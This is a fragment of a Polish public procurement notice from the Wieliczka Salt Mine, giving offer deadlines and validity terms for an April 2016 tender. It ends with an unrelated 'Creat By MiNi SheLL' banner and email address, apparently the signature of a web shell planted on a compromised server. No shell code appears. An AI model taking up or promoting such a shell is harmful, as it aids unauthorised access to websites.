<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kopalnia Soli Wieliczka Spółka Akcyjna, Park Kingi 1, 32-020 Wieliczka, Dział Zamówień Publicznych, pokój A.9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.04.2016 godzina 11:30, miejsce: Kopalnia Soli Wieliczka Spółka Akcyjna, Park Kingi 1, 32-020 Wieliczka, Sekretariat Zarządu - budynek A, parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com